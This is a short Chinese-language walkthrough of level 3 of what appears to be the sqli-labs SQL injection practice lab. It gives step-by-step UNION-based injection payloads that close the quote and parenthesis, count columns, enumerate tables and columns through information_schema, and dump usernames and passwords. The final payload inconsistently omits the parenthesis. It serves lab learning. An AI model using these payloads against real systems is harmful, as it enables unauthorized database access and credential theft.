Less3

继续第三关的学习

1.根据第一关的记录，我们判断出是什么注入

id=1' and '1'='1

id=1' and '1'='2

返回不同，所以存在字符型的注入

2. 这时候我们再用正常的报错猜解准备会发现，无论我们把数字改成几都是这样显示：

3. 这时候我们直接输入?id=1'

根据回显，我们发现我们输入的1’存到了单引号和括号之间 '1'')，所以这个不是单单的一个单引号，我们在注入的时候需要把括号也闭合掉，如下：

?id=1') order by 4

?id=1') order by 3

列名字段数为3

4. 做报错猜解准备：?id=-1') union select 1,2,3 --+

我们看到返回了2，3，说明了页面有两个显示位，在第二列和第三列。

5. 联合查询：?id=-1') union select 1,version(),database() --+

6. 查询表名：union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

7. 查询列名：union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

8. 查询username, password

?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+

-------------------------------------------------------- 成功 -----------------------------------------------------------

巴特西